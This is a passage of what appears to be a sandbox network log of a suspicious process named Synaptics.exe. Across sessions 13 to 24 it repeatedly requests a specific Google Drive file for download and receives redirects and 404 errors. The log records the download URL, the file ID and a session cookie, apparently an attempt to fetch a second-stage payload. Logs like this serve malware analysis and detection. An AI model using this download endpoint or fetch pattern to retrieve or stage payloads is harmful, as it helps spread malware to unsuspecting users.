                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49729 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:08 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49736 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:09 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-S-recOWhpQgC1cSYgut8kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49737 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:09 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2YbhVRLu_GYVnXFzjK-oMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49741 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:10 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:10 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6ze6xarUd4btSy2zfLfp15Ul1QlsGTBHIsq3LmUT5KSpde0L-8Rxo5Ta95nEIHw_4k
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qvdofiLoKEMrJQAFS2NbaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:10 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:10 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Zw_Ag_iTMHfVvzotdP0zTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:10 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49742 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WHSPaaDdq10igbPmK3qaDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      18 | 192.168.2.5 | 49743 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:10 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:10 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6rSqy7xzHkTkjdn5P-MkO5yymamI38df59wzjAIo_3P1gaXqwAKwwjg1oOr9IXIboz
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PYjB6A3Yo_M-aFospdP96w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:10 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:10 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="PNzfkXwdN8h5WVkttd9big">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:10 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      19 | 192.168.2.5 | 49744 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-vU4Gim1bThmZDc9ygXhYbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      20 | 192.168.2.5 | 49745 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:11 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HDw3QBA8V2XQec30ix3JTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      21 | 192.168.2.5 | 49746 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:11 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:11 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC77M_I40sL7sAN07boDTTQ6Kg1UzZ4PLadHPoEc3GoMTkobyi9ewKL3QFiHqvfqd4-lFVFR7Ok
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4t7u_gD_GtVsSwf5ekFksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:11 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:11 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="sCox9Ra3WxfuycYEluwImA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:11 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      22 | 192.168.2.5 | 49747 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:11 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-mneNhRzAU1HOcm6VI2OaEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      23    192.168.2.5    49748    142.250.186.33    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:11 UTC    388    OUT    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:11 UTC    1243    IN    HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5Uv6yhigimRTMEpP-qy4HWwYqvycpBA3u67CjejVuS0MlXSYMCDIxQwQJvaW-4jXjD
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:11 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qF12cW335bJDFIzs_O2L9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:11 UTC    147    IN
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:11 UTC    1390    IN
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="NRPNL80dRiBc5fqpOpmllw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:11 UTC    115    IN
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      24    192.168.2.5    49752    142.250.186.110    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
